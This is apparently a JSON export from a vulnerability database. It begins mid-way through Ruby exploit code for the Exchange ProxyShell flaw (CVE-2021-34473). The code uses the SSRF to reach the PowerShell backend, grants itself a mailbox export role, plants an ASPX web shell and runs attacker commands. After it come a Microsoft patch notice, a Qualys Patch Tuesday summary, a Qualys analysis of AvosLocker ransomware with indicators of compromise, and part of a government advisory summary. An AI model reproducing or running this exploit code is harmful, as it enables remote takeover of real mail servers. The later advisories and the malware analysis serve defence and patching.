\"#{uri}?X-Rps-CAT=#{@common_access_token}\"\n uri << \"&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\"\n opts[:cookie] = :none\n opts[:data].gsub!(\n %r{<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>(.*?)</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>},\n \"<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>http://127.0.0.1/PowerShell/</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>\"\n )\n opts[:data].gsub!(\n %r{<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI mustUnderstand=\"true\">(.*?)</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>},\n \"<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>\"\n )\n send_http(method, uri, opts)\n end\n })\n\n winrm.shell(:powershell) do |shell|\n shell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH)\n shell.extend(SSRFWinRMConnection::PowerShell)\n shell.run({ cmdlet: cmdlet, args: args })\n end\n end\n\n def exploit\n @ssrf_email ||= Faker::Internet.email\n print_status('Attempt to exploit for CVE-2021-34473')\n run_cve_2021_34473\n\n powershell_probe = send_http('GET', \"/PowerShell/?X-Rps-CAT=#{@common_access_token}&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\", cookie: :none)\n fail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200\n\n print_status('Assigning the \\'Mailbox Import Export\\' role')\n execute_powershell('New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: datastore['EMAIL'] } ])\n\n @shell_filename = \"#{rand_text_alphanumeric(8..12)}.aspx\"\n if datastore['UseAlternatePath']\n unc_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['IISBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n else\n unc_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n end\n\n normal_path = unc_path.gsub(/^\\\\+127\\.0\\.0\\.1\\\\(.)\\$\\\\/, '\\1:\\\\')\n print_status(\"Writing to: #{normal_path}\")\n register_file_for_cleanup(normal_path)\n\n @export_name = rand_text_alphanumeric(8..12)\n execute_powershell('New-MailboxExportRequest', args: [\n { name: '-Name', value: @export_name },\n { name: '-Mailbox', value: datastore['EMAIL'] },\n { name: '-IncludeFolders', value: '#Drafts#' },\n { name: '-ContentFilter', value: \"(Subject -eq '#{@draft_subject}')\" },\n { name: '-ExcludeDumpster' },\n { name: '-FilePath', value: unc_path }\n ])\n\n print_status('Waiting for the export request to complete...')\n 30.times do\n if execute_command('whoami')&.code == 200\n print_good('The mailbox export request has completed')\n break\n end\n sleep 5\n end\n\n print_status('Triggering the payload')\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n boundary = rand_text_alphanumeric(8..12)\n response = execute_command(\"cmd /c echo START#{boundary}&#{payload.encoded}&echo END#{boundary}\")\n\n print_warning('Dumping command output in response')\n if response.body =~ /START#{boundary}(.*)END#{boundary}/m\n print_line(Regexp.last_match(1).strip)\n else\n print_error('Empty response, no command output')\n end\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\n def cleanup\n super\n return unless @common_access_token && @export_name\n\n print_status('Removing the mailbox export request')\n execute_powershell('Remove-MailboxExportRequest', args: [\n { name: '-Identity', value: \"#{datastore['EMAIL']}\\\\#{@export_name}\" },\n { name: '-Confirm', value: false }\n ])\n end\n\n def execute_command(cmd, _opts = {})\n if !cmd_windows_generic?\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\"\n else\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n end\n\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @shell_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@shell_input_name}=#{cmd}\"\n )\n end\nend\n\nclass PstEncoding\n ENCODE_TABLE = [\n 71, 241, 180, 230, 11, 106, 114, 72,\n 133, 78, 158, 235, 226, 248, 148, 83,\n 224, 187, 160, 2, 232, 90, 9, 171,\n 219, 227, 186, 198, 124, 195, 16, 221,\n 57, 5, 150, 48, 245, 55, 96, 130,\n 140, 201, 19, 74, 107, 29, 243, 251,\n 143, 38, 151, 202, 145, 23, 1, 196,\n 50, 45, 110, 49, 149, 255, 217, 35,\n 209, 0, 94, 121, 220, 68, 59, 26,\n 40, 197, 97, 87, 32, 144, 61, 131,\n 185, 67, 190, 103, 210, 70, 66, 118,\n 192, 109, 91, 126, 178, 15, 22, 41,\n 60, 169, 3, 84, 13, 218, 93, 223,\n 246, 183, 199, 98, 205, 141, 6, 211,\n 105, 92, 134, 214, 20, 247, 165, 102,\n 117, 172, 177, 233, 69, 33, 112, 12,\n 135, 159, 116, 164, 34, 76, 111, 191,\n 31, 86, 170, 46, 179, 120, 51, 80,\n 176, 163, 146, 188, 207, 25, 28, 167,\n 99, 203, 30, 77, 62, 75, 27, 155,\n 79, 231, 240, 238, 173, 58, 181, 89,\n 4, 234, 64, 85, 37, 81, 229, 122,\n 137, 56, 104, 82, 123, 252, 39, 174,\n 215, 189, 250, 7, 244, 204, 142, 95,\n 239, 53, 156, 132, 43, 21, 213, 119,\n 52, 73, 182, 18, 10, 127, 113, 136,\n 253, 157, 24, 65, 125, 147, 216, 88,\n 44, 206, 254, 36, 175, 222, 184, 54,\n 200, 161, 128, 166, 153, 152, 168, 47,\n 14, 129, 101, 115, 228, 194, 162, 138,\n 212, 225, 17, 208, 8, 139, 42, 242,\n 237, 154, 100, 63, 193, 108, 249, 236\n ].freeze\n\n def self.encode(data)\n encoded = ''\n data.each_char do |char|\n encoded << ENCODE_TABLE[char.ord].chr\n end\n encoded\n end\nend\n\nclass XMLTemplate\n def self.render(template_name, context = nil)\n file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'proxyshell', \"#{template_name}.xml.erb\")\n template = ::File.binread(file_path)\n case context\n when Hash\n b = binding\n locals = context.collect { |k, _| \"#{k} = context[#{k.inspect}]; \" }\n b.eval(locals.join)\n else\n raise ArgumentError\n end\n b.eval(Erubi::Engine.new(template).src)\n end\nend\n\nclass SSRFWinRMConnection < WinRM::Connection\n class MessageFactory < WinRM::PSRP::MessageFactory\n def self.create_pipeline_message(runspace_pool_id, pipeline_id, command)\n WinRM::PSRP::Message.new(\n runspace_pool_id,\n WinRM::PSRP::Message::MESSAGE_TYPES[:create_pipeline],\n XMLTemplate.render('create_pipeline', cmdlet: command[:cmdlet], args: command[:args]),\n pipeline_id\n )\n end\n end\n\n # we have to define this class so we can define our own transport factory that provides one backed by the SSRF\n # vulnerability\n class TransportFactory < WinRM::HTTP::TransportFactory\n class HttpSsrf < WinRM::HTTP::HttpTransport\n # rubocop:disable Lint/\n def initialize(endpoint, options)\n @endpoint = endpoint.is_a?(String) ? URI.parse(endpoint) : endpoint\n @ssrf_proc = options[:ssrf_proc]\n end\n\n def send_request(message)\n resp = @ssrf_proc.call('POST', @endpoint.path, { ctype: 'application/soap+xml;charset=UTF-8', data: message })\n WinRM::ResponseHandler.new(resp.body, resp.code).parse_to_xml\n end\n end\n\n def create_transport(connection_opts)\n raise NotImplementedError unless connection_opts[:transport] == :ssrf\n\n super\n end\n\n private\n\n def init_ssrf_transport(opts)\n HttpSsrf.new(opts[:endpoint], opts)\n end\n end\n\n module PowerShell\n def send_command(command, _arguments)\n command_id = SecureRandom.uuid.to_s.upcase\n message = MessageFactory.create_pipeline_message(@runspace_id, command_id, command)\n fragmenter.fragment(message) do |fragment|\n command_args = [connection_opts, shell_id, command_id, fragment]\n if fragment.start_fragment\n resp_doc = transport.send_request(WinRM::WSMV::CreatePipeline.new(*command_args).build)\n command_id = REXML::XPath.first(resp_doc, \"//*[local-name() = 'CommandId']\").text\n else\n transport.send_request(WinRM::WSMV::SendData.new(*command_args).build)\n end\n end\n\n command_id\n end\n end\n\n def initialize(connection_opts)\n # these have to be set to truthy values to pass the option validation, but they're not actually used because hax\n connection_opts.merge!({ user: :ssrf, password: :ssrf })\n super(connection_opts)\n end\n\n def transport\n @transport ||= begin\n transport_factory = TransportFactory.new\n transport_factory.create_transport(@connection_opts)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36667", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2023-05-23T15:35:29", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "href": "/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-22T16:39:48", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:8F98074A1D86F9B965ADC16597E286ED", "href": "https://msrc.microsoft.com/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-04-15T20:03:36", "description": "This month\u2019s Microsoft Patch Tuesday addresses 108 vulnerabilities, of which 19 are rated critical severity and 88 are rated high severity. Adobe released patches for its Photoshop, Digital Editions, and Bridge products.\n\n#### CVE-2021-28310: Win32k Elevation of Privilege Vulnerability\n\nMicrosoft released patches addressing another 0-day vulnerability (CVE-2021-28310). CVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). There is a public exploit available which is being used in the wild. BITTER APT group is suspected of exploiting this CVE in the wild. This CVE has a temporal score of 7.2 from the vendor and should be prioritized for patching.\n\n#### Microsoft Exchange Server Remote Code Execution (RCE) Vulnerabilities\n\nMicrosoft released patches to fix critical RCE vulnerabilities in MS Exchange Server: CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, CVE-2021-28483. CVE-2021-28480 and CVE-2021-28481 have a critical severity score of 9.8 out of 10 and could be exploited without authentication.\n\n### Discover Patch Tuesday Vulnerabilities in VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability.qid:[`110377`, `110378`, `110379`, `375445`, `375446`, `375450`, `375451`, `375452`, `375453`, `375454`, `375455`, `50109`, `91757`, `91758`, `91759`, `91760`, `91761`]` \n\n\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`qid:110377 OR qid:110378 OR qid:110379 OR qid:375445 OR qid:375446 OR qid:375450 OR qid:375451 OR qid:375452 OR qid:375453 OR qid:375454 OR qid:375455 OR qid:50109 OR qid:91757 OR qid:91758 OR qid:91759 OR qid:91760 OR qid:91761`\n\n\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://qualys-secure.force.com/discussions/s/article/000006505>).\n\n#### Workstation Patches\n\nMicrosoft Office vulnerabilities should be prioritized for workstation-type devices.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in Photoshop, Digital Editions, and Bridge products. Patching Adobe Photoshop for CVE-2021-28542, CVE-2021-28549 and Digital Editions for CVE-2021-21100 should be prioritized due to their critical impact.\n\n### Webinar Series: This Month in Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is excited to announce the start of a new monthly webinar series \u201c[This Month in Patches](<https://www.brighttalk.com/webcast/11673/479772>).\u201d\n\nIn this new monthly webinar series, which will occur on every **Thursday after Patch Tuesday**, Qualys Research team will discuss some of the key vulnerabilities disclosed in the past month (including Microsoft Patch Tuesday) and how to patch them.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {}, "published": "2021-04-14T18:09:08", "type": "qualysblog", "title": "April 2021 Patch Tuesday \u2013 108 Vulnerabilities, 19 Critical, Adobe", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-21100", "CVE-2021-28310", "CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483", "CVE-2021-28542", "CVE-2021-28549"], "modified": "2021-04-14T18:09:08", "id": "QUALYSBLOG:352650F44A686E31669777DBEC831101", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T05:27:25", "description": "_AvosLocker is a ransomware group that was identified in 2021, specifically targeting Windows machines. Now a new variant of AvosLocker malware is also targeting Linux environments. In this blog, we examine the behavior of these two AvosLocker Ransomware in detail._\n\nAvosLocker is a relatively new ransomware-as-a-service that was first spotted in late June 2021. The attackers use spam email campaigns as initial infection vectors for the delivery of the ransomware payload. During the encryption, process files are appended with the &quot;.avos&quot; extension. An updated variant appends with the extension &quot;.avos2&quot;. Similarly, the Linux version appends with the extension &quot;.avoslinux&quot;.\n\nAfter every successful attack, the AvosLocker gang releases the names of their victims on the Dark Leak website hosted on the TOR network and provides exfiltrated data for sale. URL structure: `hxxp://avosxxx\u2026xxx[.]onion`\n\nThe AvosLocker gang also advertises their latest ransomware variants on the Dark Leak website. URL structure: `hxxp://avosjonxxx\u2026xxx[.]onion`\n\nThe gang has claimed, \u201cThe AvosLocker&#x27;s latest Windows variant is one of the fastest in the market with highly scalable threading and selective ciphers.\u201d They offer an affiliate program that provides ransomware-as-a-service (RaaS) for potential partners in crime.\n\nRecently they have added support for encrypting Linux systems, specifically targeting VMware ESXi virtual machines. This allows the gang to target a wider range of organizations. It also possesses the ability to kill ESXi VMs, making it particularly nasty.\n\nAccording to [deepweb research](<https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/>) by Cyble Research Labs, the Threats Actors of AvosLocker ransomware groups are exploiting Microsoft Exchange Server vulnerabilities using Proxyshell, compromising the victim\u2019s network.\n\nCVEs involved in these exploits are CVE-2021-34473, CVE-2021-31206, CVE-2021-34523, and CVE-2021-31207.\n\n### Technical Analysis of AvosLocker Windows Variant\n\n#### Command-Line Options\n\nThe following figure shows a sample of Command-Line Options.\n\nFig. 1: Command Line Option\n\nThe available options allow for control over items like enabling/disabling SMB brute force, mutex creation, or control over the concurrent number of threads. \nIf no options are given, the malware runs with default options as shown in figure 2, where it ignores encryption of network drives and SMB share. It runs 200 threads concurrently of its file encryption routine.\n\nFig. 2: Execution with Default Parameter\n\nWhile execution, the malware console displays detailed information about its progress on the screen (fig. 3).\n\nFig. 3: Progress Details\n\nMost of the strings in the malware are kept in the XOR encrypted format. The decryption routines are similar, only registers and keys are different (fig. 4). Strings are decrypted just before their use.\n\nFig. 4: Commonly Used Decryption Routine\n\nInitially, the malware collects the command line options provided while launching the application (fig. 5).\n\nFig. 5: Get command-line Options\n\nThen it decrypts the mutex name \u201cCheic0WaZie6zeiy\u201d and checks whether it is already running or not to avoid multiple instances (fig. 6).\n\nFig. 6: Mutex Creation\n\nAs shown in figure 7, AvosLocker uses multi-threaded tactics. It calls the below APIs to create multiple instances of worker threads into memory and share file paths among multiple threads. Smartly utilizing the computing power of multi-core CPUs.\n\nAPIs called:\n\n * CreateIoCompletionPort()\n * PostQueuedCompletionStatus()\n * GetQueuedCompletionPort()\n\nFig. 7: Use of CreateIoCompletionPort\n\nThe code creates multiple threads in a loop (fig. 8). The threads are set to the highest priority for encrypting data quickly.\n\nFig. 8: Create Thread In-Loop and Set Priority\n\nAvosLocker ransomware performs a recursive sweep through the file system (fig. 9), searches for attached drives, and enumerates network resources using API WNetOpenEnum() and WnetEnumResource().\n\nFig. 9: Search Network Share\n\nBefore selecting the file for encryption, it checks for file attributes and skips it if \u201c**FILE_ATTRIBUTE_HIDDEN**\u201d or \u201c**FILE_ATTRIBUTE_SYSTEM**\u201d as shown in figure 10.\n\nFig. 10: Check File Attribute\n\nOnce the file attribute check is passed, it performs the file extension check. It skips files from encryption if its extension gets matched with one of the extensions shown in figure 11.\n\nFig. 11: Skip Extension List\n\nIt also contains the list of files and folders that need to be skipped from the encryption (fig. 12).\n\nFig. 12: Skip File Folder List\n\nAvosLocker uses RSA encryption, and it comes with a fixed hardcoded ID and RSA Public Key of the attacker (fig. 13).\n\nFig. 13: Hardcoded Public Key\n\nAfter file encryption using RSA, it uses the ChaCha20 algorithm to encrypt encryption-related information (fig. 14).\n\nFig. 14: Use of ChaCha20\n\nIt appends this encryption-related information (fig. 15) at the end of the file with Base64 encoded format.\n\nFig.15: Encryption Related Information\n\nThen it appends the &quot;avo2&quot; extension to the file using MoveFileWithprogressW (fig. 16).\n\nFig. 16: Add Extension Using Move File\n\nAs seen in figure 17, it has appended &quot;avos2&quot; extensions.\n\nFig. 17: File with Updated Extension\n\nIt writes a ransom note (fig. 18) named \u201cGET_YOUR_FILES_BACK.txt\u201d to each encrypted directory before encryption of the file.\n\nFig. 18: Ransom Note\n\nThe ransom note instructs the user to not to shut down the system in case encryption is in progress to avoid file corruption. It asks the victim to visit the onion address with the TOR browser to pay the ransom and to obtain the decryption key to decrypt the application or files.\n\n#### AvosLocker Payment System\n\nAfter submitting the &quot;ID&quot; mentioned on the ransom note to AvosLocker&#x27;s website (fig. 19), the victim will be redirected to the &quot;payment&quot; page.\n\nFig. 19: AvosLocker&#x27;s Website\n\nIf the victim fails to pay the ransom, the attacker then puts the victim\u2019s data up for sale. Figure 20 shows the list of victims (redacted for obvious reasons) mentioned on the site.\n\nFig. 20: List of Victims\n\nAvosLocker also offers an affiliate program that provides ransomware-as-a-service (RaaS). They provide \u201chelpful\u201d services to clients such as:\n\n * Supports Windows, Linux &amp; ESXi.\n * Affiliate panel\n * Negotiation panel with push &amp; sound notifications\n * Assistance in negotiations\n * Consultations on operations\n * Automatic builds\n * Automatic decryption tests\n * Encryption of network resources\n * Killing of processes and services with open handles to files\n * Highly configurable builds\n * Removal of shadow copies\n * Data storage\n * DDoS attacks\n * Calling services\n * Diverse network of penetration testers, access brokers and other contacts\n\nFig. 21: Partnership Program\n\n### Technical Analysis of AvosLocker Linux Variant\n\nIn this case, the AvosLocker malware arrives as an elf file. As shown in figure 22, the analyzed file is x64 based Linux executable file.\n\nFig. 22: File Details\n\nIt\u2019s a command-line application having some command-line options (fig. 23).\n\nFig. 23: Command-Line Options\n\nThe `<Thread count>` parameter as shown above represents the number of threads that can be created to encrypt files simultaneously. It possesses the capability to kill ESXi VMs based on the parameter provided while executing.\n\nUpon execution, the malware first collects information about the number of threads that need to be created. Then it checks for string \u201cvmfs\u201d in the file path provided as a command-line argument (fig. 24).\n\nFig. 24: Checks for \u201cvmfs\u201d\n\nAfter that, it also checks for string \u201cESXi\u201d in the file path provided as a command-line argument (fig. 25).\n\nFig. 25: Checks for \u201cESXi\u201d\n\nIf this parameter is found, then it calls a routine to kill the running ESXi virtual machine (fig. 26).\n\nFig. 26: Code to Kill ESXi Virtual Machine\n\nThe command used for killing the ESXi virtual machine is as shown in figure 27.\n\nFig. 27: Command to Kill Running ESXi Virtual Machine\n\nFurther, AvosLocker drops a ransom note file (fig. 28) at the targeted directory.\n\nFig. 28: Create ransom note\n\nAfter that, it starts creating a list of files that must be encrypted. Before adding a file path to the list, it checks whether it is a regular file or not (fig. 29). Only regular files are added to the encryption list.\n\nFig. 29: Checks File Info\n\nAvosLocker skips the ransom note file and any files with the extension \u201cavoslinux\u201d from adding into the encryption list (fig. 30).\n\nFig. 30: Skip \u201cavoslinux\u201d Extension File\n\nThen it calls the mutex lock/unlock API for thread synchronization as shown in figure 31.\n\nFig. 31: Lock-Unlock Mutex for Thread Synchronization\n\nBased on the number of threads specified, it creates concurrent CPU threads (fig. 32). This helps in encrypting different files simultaneously at a very fast speed.\n\nFig. 32: Create Threads in Loop\n\nAvosLocker\u2019s Linux variant makes use of Advanced Encryption Standard (AES) and elliptic-curve cryptography (ECC) algorithms for data encryption.\n\nFile-related information along with the encryption key used might be encrypted and then encoded with base 64 formats. This encoded information is added at the end of each encrypted file (fig. 33).\n\nFig. 33: File-related Info added at the end\n\nFigure 34 shows the malware appending the extension \u201c.avoslinux\u201d to the encrypted file names.\n\nFig. 34: Append file extension \u201c.avoslinux\u201d after encryption\n\nBefore starting file encryption, it creates a ransom note named \u201cREADME_FOR_RESTORE \u201c. The content of this ransom note is shown in figure 35.\n\nFig. 35: Ransom Note\n\nThe ransom note instructs the victim not to shut down the system in case encryption is in progress to avoid file corruption. It asks the victim to visit the onion address with a TOR browser to pay the ransom and to obtain the decryption key and decryption application.\n\n### Indicators of Compromise (IOCs):\n \n \n Windows: C0A42741EEF72991D9D0EE8B6C0531FC19151457A8B59BDCF7B6373D1FE56E02\n \n \n Linux: 7C935DCD672C4854495F41008120288E8E1C144089F1F06A23BD0A0F52A544B1\n \n \n URL:\n hxxp://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad[.]onion.\n hxxp://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad[.]onion\n\n### TTP Map:\n\nInitial Access| Execution| Defense Evasion| Discovery| Impact \n---|---|---|---|--- \nPhishing (T1566)| User Execution \n(T1204)| Obfuscated Files or Information (T1027)| System Information Discovery (T1082)| Data Encrypted for Impact \n(T1486) \n| | | File and Directory Discovery (T1083)| Inhibit System Recovery \n(T1490)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-07T05:18:46", "type": "qualysblog", "title": "AvosLocker Ransomware Behavior Examined on Windows & Linux", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-07T05:18:46", "id": "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-24T19:24:47", "description": "A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.&#x27;s CISA, NSA, and FBI; Canada&#x27;s CCCS; U.K.&#x27;s NCSC-UK; Australia&#x27;s ACSC; and New Zealand&#x27;s NCSC-NZ and CERT NZ. \n\nThis collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. The realization that cybersecurity is not limited to national borders but is a shared responsibility is growing more evident. \n\nThe CSA sheds light on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited in 2022 and the associated Common Weakness Enumeration(s) (CWE). It outlines crucial technical details and key findings, providing actionable guidance and mitigation strategies. Vendors, designers, developers, and end-user organizations are strongly urged to implement these guidelines to strengthen their defenses against possible threats. \n\n### **The Cybersecurity Advisory (CSA) has identified the following key findings that outline essential insights into the behaviors and tendencies of malicious cyber actors for 2022:** \n\n * **Older Vulnerabilities Targeted**: Malicious cyber actors exploited older software vulnerabilities more frequently, targeting unpatched, internet-facing systems. \n * **Proof of Concept (PoC) Code**: Public availability of PoC code likely facilitated broader exploitation by malicious actors. \n * **Success in First Two Years**: Known vulnerabilities are most successfully exploited within the first two years of disclosure. Timely patching reduces this effectiveness. \n * **Prioritization of Severe CVEs**: Cyber actors prioritize severe and globally prevalent vulnerabilities, seeking low-cost, high-impact tools and paying attention to vulnerabilities principal in specific targets&#x27; networks. \n * **Detection through Deep Packet Inspection**: Deep packet inspection can often detect exploits involving multiple CVE or CVE chains. \n\nIn 2022, malicious cyber actors routinely exploited 12 severe vulnerabilities, affecting various products and services. These issues included the long-exploited Fortinet SSL VPNs&#x27; CVE-2018-13379 and widespread vulnerabilities such as Apache&#x27;s Log4Shell (CVE-2021-44228). They impacted multiple systems, from Microsoft Exchange email servers to Atlassian Confluence and software like Zoho ManageEngine 